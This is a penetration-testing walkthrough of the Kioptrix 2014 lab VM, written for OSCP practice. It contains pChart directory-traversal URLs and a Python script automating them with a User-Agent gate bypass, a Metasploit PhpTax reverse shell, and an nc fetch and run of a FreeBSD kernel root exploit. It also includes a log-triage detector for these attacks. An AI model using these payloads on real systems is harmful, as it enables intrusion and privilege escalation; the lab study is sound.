Kioptrix

This is the first of a list of VMs hosted on [vulnhub](https://vulnhub.com) that are good practice when preparing for the OSCP exam: Kioptrix 2014.
More will follow, but I'm starting with this one, and it should be an easy one.
Recon
First off I need to know what ports are open and what services are running.
```
┌──[root@n0w4n]─[~/vulnhub]
└──╼ # nmap -n -v -T4 -sS -sV -sC -p- 192.168.50.133
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-27 15:47 CEST
Host is up (0.00038s latency).
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
MAC Address: 00:0C:29:64:61:C0 (VMware)
NSE: Script Post-scanning.
Initiating NSE at 15:47
Completed NSE at 15:47, 0.00s elapsed
Initiating NSE at 15:47
Completed NSE at 15:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.63 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (156B)
```
So there are web servers on ports 80 and 8080, and port 22 is reported closed rather than filtered: the host answers, but nothing is listening for SSH.
The Server banner mentions mod_ssl and OpenSSL even though no port 443 is open, so the module is loaded but not serving anything. More useful is the "(FreeBSD)" in the Apache version string: without an OS fingerprint (-O) the service banner already tells me this is a FreeBSD system, which matters later for where configuration and log files live.
Webserver
When curling the webserver on port 80, I get:
When curling the webserver on port 8080, I get:
The HTML comment in the first response is a hint: it points to a pChart installation, which is the actual content of the site.
Google has this to say about pChart: *pChart is a PHP library that will help you to create anti-aliased charts or pictures directly from your web server.*
```
┌──[root@n0w4n]─[~/vulnhub]
└──╼ # searchsploit pchart
----------------------------------------- ----------------------------------
 Exploit Title                           |  Path (/usr/share/exploitdb/)
----------------------------------------- ----------------------------------
pChart 2.1.3 - Multiple Vulnerabilities  | exploits/php/webapps/31173.txt
----------------------------------------- ----------------------------------
Shellcodes: No Result
```
The exploit write-up describes a directory traversal in the Script parameter of examples/index.php, which is exactly what I need for reading files off the box.
To confirm it works, I request /etc/passwd: it exists and is world-readable on practically every Unix system, so it is the standard first test for a file-read bug.
```
http://192.168.50.133/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin
```
It works. Three non-system accounts show up (UID 1000 and up): ossec, ossecm and ossecr, all created by OSSEC-HIDS, and all three have /sbin/nologin as their shell, so they cannot log in.
Two caveats when reading a FreeBSD passwd file. The `*` in the password field does not mean the account is locked: the real hashes live in /etc/master.passwd, which is readable only by root, and /etc/passwd always shows `*`. And the second UID 0 account, toor, has an empty shell field, which login(1) treats as /bin/sh rather than "no shell"; toor is the traditional FreeBSD backup superuser.
root itself uses csh, the FreeBSD default root shell.
Because this is FreeBSD, keep in mind that files live in different places than on a Debian-based distro: the base system is under /etc, but third-party packages such as Apache, MySQL and OSSEC install under /usr/local, with their configuration in /usr/local/etc. A good first stop is /etc/rc.conf, which lists what is enabled at boot:

```
http://192.168.50.133/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/rc.conf

hostname="kioptrix2014"
ifconfig_em0="DHCP"
sshd_enable="NO"
# Set dumpdev to "AUTO" to enable crash dumps, "NO" to disable
dumpdev="NO"
apache22_enable="YES"
mysql_enable="YES"
firewall_enable="YES"
firewall_script="/etc/ipfw.rules"
ossechids_enable="YES"
rc_debug="NO"
monitor_enable="YES"
```

This confirms the scan: sshd is disabled (hence the closed port 22), ipfw is running, and OSSEC-HIDS is enabled, so my web requests are being watched by a host IDS.
Next is the Apache configuration. The nmap banner (Apache 2.2) and apache22_enable above both say the package is apache22, so the file I want is /usr/local/etc/apache22/httpd.conf.
```
http://192.168.50.133/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

...[SNIP]...
# DocumentRoot: The directory out of which you will serve your
# documents. By default, all requests are taken from this directory, but
# symbolic links and aliases may be used to point to other locations.
#
DocumentRoot "/usr/local/www/apache22/data"
...[SNIP]...
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
    DocumentRoot /usr/local/www/apache22/data2
    <Directory "/usr/local/www/apache22/data2">
        Options Indexes FollowSymLinks
        AllowOverride All
        Order allow,deny
        Allow from env=Mozilla4_browser
    </Directory>
</VirtualHost>
```
At the bottom of the file there is a VirtualHost for port 8080. Its Directory block uses Order allow,deny with a single Allow rule, env=Mozilla4_browser, and that variable is only set by the SetEnvIf line when the User-Agent header starts with Mozilla/4.0. Every other client is denied, which is why the earlier request to 8080 did not show the real content.
So I need a different user agent. Testing with curl's default agent first confirms the denial; repeating the request with a User-Agent that starts with Mozilla/4.0 (curl's -A option) returns the page. The gate is nothing more than a header check.
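As an added example (not code from the walkthrough), here is a small Python helper that wraps the two tricks used so far, the pChart traversal URL and the Mozilla/4.0 User-Agent gate on port 8080, and that parses the passwd output the FreeBSD way instead of the Linux way. The target IP, the traversal URL shape and the file paths come from the page; the User-Agent string, the FREEBSD_FILES list, the function names and the PASSWD_SAMPLE subset are my own additions.

```python
"""Added example (not from the walkthrough): fetch files through the pChart
traversal with a chosen User-Agent, and read a FreeBSD passwd file correctly.

Assumptions: TARGET is the lab IP from the page; the 8080 vhost gate and the
traversal URL shape are taken from the httpd.conf and URLs shown above.
"""
import sys
import urllib.request

TARGET = "192.168.50.133"                             # lab IP from the page
TRAVERSAL_SCRIPT = "/pChart2.1.3/examples/index.php"  # vulnerable pChart 2.1.3 example
MOZILLA4 = "Mozilla/4.0 (compatible; MSIE 6.0)"       # assumed UA; must start with Mozilla/4.0

# FreeBSD locations; the Debian equivalents (/etc/apache2, /var/www) do not exist here.
FREEBSD_FILES = [
    "/etc/passwd",
    "/etc/rc.conf",
    "/usr/local/etc/apache22/httpd.conf",
    "/var/log/httpd-access.log",
]


def build_url(path, host=TARGET, port=80, depth=2):
    """Traversal URL in the form used on the page: Script=%2f..%2f..%2f<path>.

    index.php resolves Script relative to pChart2.1.3/examples/, so two '..'
    components leave the document root. Slashes stay encoded as %2f, which
    is what the page sends; 'depth' lets you climb further if the app moves.
    """
    climb = "".join("%2f.." for _ in range(depth))
    origin = f"http://{host}" if port == 80 else f"http://{host}:{port}"
    return f"{origin}{TRAVERSAL_SCRIPT}?Action=View&Script={climb}%2f{path.lstrip('/')}"


def fetch(url, user_agent=MOZILLA4, timeout=10):
    """GET url with an explicit User-Agent.

    The port-8080 VirtualHost only allows clients whose User-Agent starts with
    Mozilla/4.0 (SetEnvIf + 'Allow from env=Mozilla4_browser'); sending that
    header is the whole bypass. Port 80 does not care, so one agent serves both.
    """
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def parse_passwd(text):
    """Parse passwd(5) lines, applying three FreeBSD-specific rules.

    * The password field is always '*' in /etc/passwd: hashes live in
      /etc/master.passwd (root-only), so '*' does not mean 'locked'.
    * An empty shell field means login(1) uses /bin/sh, not 'no shell'.
    * '&' in the GECOS field expands to the capitalised login name.
    """
    users = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue                       # not a passwd line (HTML chrome, blank, etc.)
        name, _, uid, gid, gecos, home, shell = fields
        shell = shell or "/bin/sh"
        users.append({
            "name": name,
            "uid": int(uid),
            "gid": int(gid),
            "gecos": gecos.replace("&", name.capitalize()),
            "home": home,
            "shell": shell,
            "can_login": not shell.endswith("nologin"),
        })
    return users


def interesting_accounts(users):
    """UID 0 accounts plus any human (UID >= 1000) account with a usable shell."""
    return [u for u in users if u["uid"] == 0 or (u["uid"] >= 1000 and u["can_login"])]


# Subset of lines copied from the /etc/passwd output above.
PASSWD_SAMPLE = """\
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
"""

if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else TARGET
    for path in FREEBSD_FILES:
        print(f"=== {path}")
        print(fetch(build_url(path, host)))
```

Run it with the target IP as the only argument to dump the four FreeBSD files in one go. Running parse_passwd over the earlier output reports root and toor as the only accounts with a usable shell (toor because of the empty shell field) and leaves the three OSSEC accounts out because they are nologin.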
The site on 8080 turns out to be some kind of income tax form application.
It is PHP, and the software identifies itself as PhpTax; its requests carry a pfilez parameter, which gives me two things to search for.
```
┌──[root@n0w4n]─[~/vulnhub]
└──╼ # searchsploit phptax
-------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                      |  Path (/usr/share/exploitdb/)
-------------------------------------------------------------------- ----------------------------------
PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit)      | exploits/php/webapps/21833.rb
PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution   | exploits/php/webapps/25849.txt
phptax 0.8 - Remote Code Execution                                  | exploits/php/webapps/21665.txt
-------------------------------------------------------------------- ----------------------------------
Shellcodes: No Result
```
The first entry, a Metasploit module for the pfilez parameter, looks the most promising.
```
msf5 > search pfilez

Matching Modules
================

   #  Name                            Disclosure Date  Rank       Check  Description
   -  ----                            ---------------  ----       -----  -----------
   0  exploit/multi/http/phptax_exec  2012-10-08       excellent  Yes    PhpTax pfilez Parameter Exec Remote Code Injection

msf5 > use exploit/multi/http/phptax_exec
msf5 exploit(multi/http/phptax_exec) > options

Module options (exploit/multi/http/phptax_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /phptax/         yes       The path to the web application
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   PhpTax 0.8

msf5 exploit(multi/http/phptax_exec) > set rhosts 192.168.50.133
rhosts => 192.168.50.133
msf5 exploit(multi/http/phptax_exec) > set rport 8080
rport => 8080
msf5 exploit(multi/http/phptax_exec) > set lhost 192.168.50.130
lhost => 192.168.50.130
msf5 exploit(multi/http/phptax_exec) > exploit

[*] Started reverse TCP double handler on 192.168.50.130:4444
[*] 192.168.50.133:8080 - Sending request...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 2e2fcgbkJnIGuNf4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Command: echo uWvGYkyY1ExTYAiC;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "2e2fcgbkJnIGuNf4\r\n"
[*] Matching...
[*] A is input...
[*] Reading from socket B
[*] B: "uWvGYkyY1ExTYAiC\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.50.130:4444 -> 192.168.50.133:64031) at 2019-05-27 16:59:36 +0200
[*] Command shell session 2 opened (192.168.50.130:4444 -> 192.168.50.133:54454) at 2019-05-27 16:59:36 +0200

id
uid=80(www) gid=80(www) groups=80(www)
```
That is a shell on the target as www (uid 80), the account Apache runs as. Only RPORT had to change from the default; nothing was done about the Mozilla/4.0 gate, so the module's default User-Agent evidently passes it. If it had not, the module's UserAgent advanced option is the place to fix that.
After some time searching the system, a kernel exploit looks like the most promising way to escalate privileges. First the exact release:
```
$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
```
```
┌──[root@n0w4n]─[~/vulnhub/kioptrix]
└──╼ # searchsploit freebsd 9.0
----------------------------------------------------------------- ----------------------------------
 Exploit Title                                                   |  Path (/usr/share/exploitdb/)
----------------------------------------------------------------- ----------------------------------
FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation           | exploits/freebsd/local/28718.c
FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation     | exploits/freebsd/local/26368.c
----------------------------------------------------------------- ----------------------------------
Shellcodes: No Result
```
The second entry, 26368.c (the mmap/ptrace bug from FreeBSD-SA-13:06, CVE-2013-2171, which affects 9.0 and 9.1), is the one to use. Time to copy it to the target. There is no need for a web server: a plain nc connection works in both directions.
First a listener on my end with the file on its stdin, so the content is sent as soon as the target connects:
```
┌──[root@n0w4n]─[~/vulnhub/kioptrix]
└──╼ # nc -lvnp 9999 < 26368.c
listening on [any] 9999 ...
```
Then, from the www shell, connect to the listener and redirect what arrives into a file under /tmp, one of the few places www can write. The -w3 makes nc give up after 3 seconds without data, which is what ends the transfer once the file has been sent. Before compiling, check that the copy arrived intact, for example by comparing the size (ls -l) or a hash on both ends; FreeBSD's base system has md5(1) and sha256(1) rather than md5sum and sha256sum.

```
$ nc -w3 192.168.50.130 9999 > /tmp/exploit.c
```
Now compile and run it. FreeBSD 9.0 still ships gcc in the base system, so no toolchain has to be brought over, and the warning about the missing newline is harmless.

```
$ cd /tmp
$ gcc exploit.c -o exploit
exploit.c:89:2: warning: no newline at end of file
$ ./exploit
id
uid=0(root) gid=0(wheel) egid=80(www) groups=80(www)
```
It worked: uid 0 and gid 0 (wheel). The leftover egid=80 is inherited from the www process the exploit was launched from and does not limit what root can read.
Time for the final step: retrieve the flag.
```
# cd /root
# ls -lah
total 88
drwxr-xr-x   2 root  wheel   512B May 27 09:19 .
drwxr-xr-x  18 root  wheel   1.0k Apr  6  2014 ..
-rw-r--r--   2 root  wheel   793B Jan  3  2012 .cshrc
-rw-------   1 root  wheel     0B Apr  6  2014 .history
-rw-r--r--   1 root  wheel   151B Jan  3  2012 .k5login
-rw-r--r--   1 root  wheel   299B Jan  3  2012 .login
-rw-------   1 root  wheel     1B Mar 30  2014 .mysql_history
-rw-r--r--   2 root  wheel   256B Jan  3  2012 .profile
----------   1 root  wheel   2.6k Apr  3  2014 congrats.txt
-rw-r--r--   1 root  wheel   362B May 27 11:47 folderMonitor.log
lrwxr-xr-x   1 root  wheel    25B Mar 29  2014 httpd-access.log -> /var/log/httpd-access.log
-rwxr-xr-x   1 root  wheel   574B Apr  3  2014 lazyClearLog.sh
-rwx------   1 root  wheel   2.3k Mar 28  2014 monitor.py
lrwxr-xr-x   1 root  wheel    44B Mar 29  2014 ossec-alerts.log -> /usr/local/ossec-hids/logs/alerts/alerts.log
# cat congrats.txt
If you are reading this, it means you got root (or cheated).
Congratulations either way...

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in
mind, and not meant for the seasoned pentester. However this does not mean one
can't enjoy them.

As with all my VMs, besides getting "root" on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and "hope" it works, but think about the traffic.. the logs... Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targetted attacks.

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won't from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".
It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data".

Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things.
Default settings, nothing fancy but it should've logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and
modified files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't
use OSSEC-HIDS for this.
The httpd-access.log is rather self-explanatory.
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring
certain files. This one should've detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good...

loneferret
http://www.kioptrix.com

p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by default it would've
blocked your IP (both in hosts.allow & Firewall) for 600 seconds. I was nice enough to
remove that part :)
```
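As an added example, not part of the walkthrough and not loneferret's code, here is the kind of triage I would run over httpd-access.log to answer the "how much noise" question in congrats.txt. The log format is assumed to be Apache's combined format; the sample lines are constructed to mirror the requests made in this write-up (an nmap script probe, a plain curl, the pChart traversal including a double-encoded variant, a benign PhpTax request and a pfilez injection), and the /phptax/drawimage.php path and the .tob value in the last two lines are my assumptions about what the public exploit and the application send, which the page itself does not show.

```python
"""Added example (not part of the walkthrough or of congrats.txt): triage an
Apache access log for the kind of noise this attack generates.

Assumptions: the log is in Apache's combined format (the FreeBSD default
httpd-access.log); the sample lines below are constructed, not copied from
the VM, and the /phptax/drawimage.php path is the one the public exploit
uses, which the page itself does not show.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Apache "combined" log format: ip ident user [ts] "req" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
SHELL_META = re.compile(r"[;&|`$()]")   # characters that mean 'command boundary' to a shell


def decode_fully(s, limit=4):
    """Percent-decode until the string stops changing (catches %252f tricks)."""
    for _ in range(limit):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s


def parse_line(line):
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def query_params(target):
    """Split the raw query string before decoding, so a ';' inside a value
    stays with its parameter instead of being treated as a separator."""
    _, _, query = target.partition("?")
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(decode_fully(key), []).append(decode_fully(value))
    return params


def classify(entry):
    """Return the list of things this request would have tripped."""
    findings = []
    if "../" in decode_fully(entry["target"]):
        findings.append("path-traversal")
    for value in query_params(entry["target"]).get("pfilez", []):
        if SHELL_META.search(value):
            findings.append("pfilez-command-injection")
            break
    if "Nmap Scripting Engine" in entry["ua"]:      # default UA of nmap's http NSE library
        findings.append("nmap-nse-scan")
    return findings


def triage(lines):
    """Summarise a log: finding counts, per-IP request counts, unparsable lines."""
    findings, per_ip, bad = Counter(), Counter(), 0
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            bad += 1
            continue
        per_ip[entry["ip"]] += 1
        findings.update(classify(entry))
    return {"findings": findings, "per_ip": per_ip, "unparsable": bad}


# Constructed sample (not real log data). The drawimage.php path and the .tob
# value are assumptions about the exploit and the app, not taken from the page.
SAMPLE_LOG = [
    '192.168.50.130 - - [27/May/2019:15:47:12 +0200] "GET / HTTP/1.1" 200 152 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"',
    '192.168.50.130 - - [27/May/2019:15:52:01 +0200] "GET / HTTP/1.1" 200 152 "-" "curl/7.64.0"',
    '192.168.50.130 - - [27/May/2019:16:03:40 +0200] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1541 "-" "curl/7.64.0"',
    '192.168.50.130 - - [27/May/2019:16:05:12 +0200] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/rc.conf HTTP/1.1" 200 311 "-" "curl/7.64.0"',
    '192.168.50.130 - - [27/May/2019:16:06:02 +0200] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%252f..%252f..%252fetc%252fhosts HTTP/1.1" 200 98 "-" "curl/7.64.0"',
    '192.168.50.130 - - [27/May/2019:16:40:10 +0200] "GET /phptax/index.php?pfilez=2012.tob HTTP/1.1" 200 4120 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"',
    '192.168.50.130 - - [27/May/2019:16:59:36 +0200] "GET /phptax/drawimage.php?pfilez=xxx;id;&pdf=make HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"',
]

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            report = triage(fh)
    else:
        report = triage(SAMPLE_LOG)
    for name, n in report["findings"].most_common():
        print(f"{n:4d}  {name}")
    print(f"{report['unparsable']} unparsable line(s); per-IP: {dict(report['per_ip'])}")
```

Point it at a copy of /var/log/httpd-access.log to see the real tally. Two design points matter for the detector: the query string is split on & before any decoding, so a literal ; in pfilez is seen as part of the value rather than as a separator, and the decode loop runs until the text stops changing, so a double-encoded ..%252f.. is still caught as traversal. OSSEC's default web rules key on much the same patterns, which is why congrats.txt expects them to have fired.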